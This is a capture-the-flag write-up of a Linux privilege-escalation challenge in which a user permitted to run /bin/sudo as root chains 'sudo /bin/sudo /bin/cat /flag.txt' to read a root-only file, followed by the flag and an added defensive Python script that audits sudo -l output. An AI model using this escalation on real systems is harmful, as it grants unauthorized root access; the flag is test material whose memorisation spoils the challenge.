HN0x03 | Escalade comme un Yamakasi - dontLookUp
This challenge is a part of the Hacky’Nov 0x03 CTF.
Goal
Read the flag at the root of the filesystem.
Walkthrough
Again, we check the sudo permissions:
user@4987e758f6a9:~$ sudo -l
[sudo] password for user:
Matching Defaults entries for user on 4987e758f6a9:
env_reset, mail_badpass, secure_path=/root\:/root/sbin\:/tmp\:/root/usr/local/bin\:/root/usr/sbin\:/root/usr/bin\:/root/sbin\:/root/bin
User user may run the following commands on 4987e758f6a9:
(ALL) /bin/sudo
Here, we can see that we can run the sudo command as root. This means we can run sudo sudo to do anything:
user@4987e758f6a9:~$ sudo sudo cat /flag.txt
sudo: sudo: command not found
OK, that’s just because /bin is not in the $PATH of the user. No worries here, let’s use full paths:
user@4987e758f6a9:~$ sudo /bin/sudo /bin/cat /flag.txt
HNx03{Ok_STOP_with_sudo}
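From the defender's side, both weaknesses in this challenge are visible in the sudo -l output itself. The following audit script is an added example, not part of the original write-up: it parses that output and flags a rule that lets a user run sudo (or a shell) as root, and a secure_path entry in a world-writable directory. The function names and the two lookup sets are assumptions made for illustration.

```python
import re

# `sudo -l` output copied from the walkthrough (password prompt omitted).
SUDO_L = r"""Matching Defaults entries for user on 4987e758f6a9:
env_reset, mail_badpass, secure_path=/root\:/root/sbin\:/tmp\:/root/usr/local/bin\:/root/usr/sbin\:/root/usr/bin\:/root/sbin\:/root/bin
User user may run the following commands on 4987e758f6a9:
(ALL) /bin/sudo
"""

# Assumption: short illustrative lists, extend them for a real audit.
ROOT_EQUIVALENT = {"ALL", "sudo", "su", "sh", "bash", "dash", "zsh"}
WORLD_WRITABLE = {"/tmp", "/var/tmp", "/dev/shm"}

def secure_path_dirs(text):
    """Directories of the secure_path default (sudo -l prints ':' as '\\:')."""
    m = re.search(r"secure_path=((?:\\.|[^,\s\\])+)", text)
    return m.group(1).replace("\\:", ":").split(":") if m else []

def rules(text):
    """(runas, command) pairs listed after the 'may run' header."""
    out, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        # Optional tags such as NOPASSWD: are skipped before the command.
        m = re.match(r"\s*\(([^)]*)\)\s*(?:[A-Z_]+:\s*)*(.+)", line) if in_rules else None
        if m:  # simplification: commands are split on plain commas
            out += [(m.group(1), c.strip()) for c in m.group(2).split(",")]
    return out

def audit(text):
    """Return human-readable findings for one user's `sudo -l` output."""
    findings = []
    for d in secure_path_dirs(text):
        if d in WORLD_WRITABLE:
            findings.append(f"secure_path contains world-writable directory {d}")
    for runas, cmd in rules(text):
        as_root = runas.split(":")[0].strip() in ("ALL", "root")
        name = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the binary
        if as_root and name in ROOT_EQUIVALENT:
            findings.append(f"({runas}) {cmd} is equivalent to unrestricted root")
    return findings

if __name__ == "__main__":
    for finding in audit(SUDO_L):
        print("[!]", finding)
```

The fix for the first finding is to grant only the specific commands the user needs rather than sudo itself; for the second, keep secure_path limited to root-owned directories.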